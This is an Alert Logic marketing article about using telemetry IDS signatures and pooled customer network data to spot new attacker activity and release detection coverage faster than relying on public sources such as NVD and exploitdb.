Intelligence-Driven Threat Detection

The principal goal of threat intelligence within Alert Logic is to identify the new activities of attackers so that coverage can be built. This data can be acquired externally (public internet) or internally (internal log or network data). Sourcing information solely from external sources (from CVEs etc.) provides no expectation that attackers are actively using those methods. By pivoting on internally sourced network data our experts can concentrate on the current and live activities of attackers—providing the maximum value and protection for customers right now.

To support this ability in our Network IDS, we in Alert Logic release specialized signatures called “telemetry signatures”. Firings of these signatures and their payload data are post processed under an intelligence-driven batch analytics framework to find the attacking “needles” in the network “haystack”. Therefore, coverage released by the team is highly tied to current and evolving attacker behavior—allowing us to walk in the attacker’s shadow.

Modern Signature Detection

A traditional IDS is fed with signatures. A signature in this regard just means selecting sections of the full network traffic that you consider to be potentially malicious. Signatures can be very specific, or they can be very general. Specific signatures help for identifying very exact and targeted threats. General signatures allow the gathering of large volumes of network data for the purpose of analytics, data science and anomaly detection. In Alert Logic we employ both types:

  • It is entirely possible to capture previously unknown attacks with General IDS signatures (we did this with CVE-2019-2725)
  • It is entirely possible to identify data breaches with General IDS signatures
  • It is entirely possible to definitively identify that you have been breached using specific signatures

Alert Logic researchers have a special term for these General signatures, called “telemetry”. Automation and data science-backed tooling allows for rapid and scalable value to be extracted from large troves of IDS network data—and this is how we extract value from these telemetry signatures.

We generate over 2 billion IDS events across our customers every year, and that number increases by hundreds of millions every year. We make close to 80 new IDS data points every single second. This is a huge volume of data and drives a large component of our breach and threat detection today.

Public Data Sources

Common public data sources for information on attacker behavior include the National Vulnerability Database (NVD) or exploitdb. NVD hosts CVE (Common Vulnerability Enumeration) identifiers—used in the industry to ensure a common language when speaking about vulnerabilities. Exploitdb lists exploits for a large range of technologies which have been posted by contributors. It can be a very valid source of information about new exploits which are available. This is different from NVD, which lists vulnerabilities. Just because a vulnerability exists, does not mean that an exploit exists or is even possible. As a result, CVEs are a better reference for security controls like vulnerability scanners and exploitdb could be considered a good reference for intrusion detection.

Exploitdb has over 47,000 exploits listed as of this writing, and NVD lists over 115,000, with tens of thousands of new vulnerabilities released every year. The increase in the volume of new vulnerabilities and exploits for both sources is accelerating every year. If we were to consider it might take an hour to provide threat detection for each item on either NVD or exploitdb then one security expert working alone, 8 hours a day, for 5 days a week would need:

  • 1,175 weeks to cover the backlog of exploitdb (over 22 years)
  • 2,875 weeks to cover the backlog of NVD (over 55 years)

And this does not consider the additional staffing needed to maintain parity or allow for variations in complexity. Note too, that we are only considering two public sources here, when there are dozens of sources available which would be in scope to analyze.

In Alert Logic we dedicate a portion of resources to addressing and providing coverage for threats from these public sources. Our history of analysis of these threats has led us to a reliable selection criteria for which vulnerabilities and exploits are likely to be targeted by attackers, however, still only less than 10 percent of the exploits which are covered are actively in use by attackers against our customers at any one time. At that rate of return, based on the numbers provided above—one could spend 20 years' worth of man-hours providing protection for all of exploitdb to extract 2 years' worth of attacker coverage value.

Threat-Centered Approach

Threat is a term which is used interchangeably in the media and the security industry to mean lots of things, but it does have a specific formal meaning. A threat is one component of overall risk.

Risk is calculated as: Risk = Asset + Vulnerability + Threat

This means that the risk to a business of a compromise or security incident is dependent on:

  • The presence of the asset which is to be attacked
  • A vulnerability on the asset which can be exploited
  • The threat that an internal or external actor would exploit the weakness

If you remove any one of these three aspects, then the risk to an organization drops dramatically. As a result, for a risk to be real and practically actionable for a business, a threat must exist. These threats are created by malicious actors, who aim to exploit vulnerabilities on assets. Put more simply, if no-one is attacking you then no-one can breach you.

With this in mind our team in Alert Logic are laser-focused on what threats are being posed by actors against our customers right now. The most direct route to identify the threats against customers is to look in customer log and network data and use that to drive new coverage and research work. It means that customers get the coverage they need, tailored to their threat exposure.

Better Together

As indicated in Alert Logic’s 2018 Critical Watch Report, “spray and pray” is the predominant attack type across the internet—with the attack chain being compressed such that reconnaissance is becoming a dying art. Due to the scale of the customer data at our disposal in this approach, we are able to convert what might otherwise be considered a reactive coverage approach into a proactive coverage approach. This is based on the extensively observed behavior that the vast majority of attacks being perpetrated across the internet are not successful. Let’s describe how this can be done with an analogy.

Consider that we lay out the entire IP space of all Alert Logic customers end to end, and an attacker begins a new attack against these customers, starting at the left-hand side and moving right.

In this scenario, we have several milestones, indicated in colored lines in the diagram:

  • Red: Identification of the new attack, as close as possible to the starting point (the left-hand side)
  • Green: Time to release coverage for this specific threat
  • Blue: First possible instance of a host vulnerable to this new attack

Our goal as an intelligence-driven organization is to identify the presence of attack as close as possible between the first orange line and the red line. Then, our goal is to release coverage as quickly as possible between the red and green lines. The more you can shrink those intervals, the more effective you will be in rapidly providing coverage. Consider too that the entire length of these chains might be measured in hours or days.

If we can release the coverage quickly, then detection is released before an attack is launched against a customer who is potentially susceptible to that vulnerability. This is described in the image below by the transparent orange box. Those sets of customers now have threat detection in place as a consequence of proactive analysis of the latest attacker threats.

In this way, customers are able to gain better protection as one single unit than as individual security organizations and they all benefit from the increase in attack surface visibility. To draw direct parallels in the analogy, consider the image below. The landscape at the top is Alert Logic, and the much-reduced visibility scope below is an individual customer. The individual customer must react much more quickly, with much less notice and greatly reduced data.

This approach is completely agnostic to any public source reporting. It is irrelevant to this process, just as it is irrelevant to attackers, whether exploit code is available in the public domain or listed on a formal information security site such as NVD or exploitdb. Customers get the coverage they need, for the most dangerous threats they experience.

An organization can theoretically implement and manage a similar process on their own. It can be expensive and resource-intensive, though, and—as illustrated above—result in reduced visibility and inadequate reaction time. Alert Logic works with over 4,000 customers around the world and we have the platform, intelligence, and experts to apply intelligence-driven threat detection at scale to proactively identify and defend against threats. We provide cost-effective protection, and we deliver better peace of mind than what organizations can achieve attempting this on their own.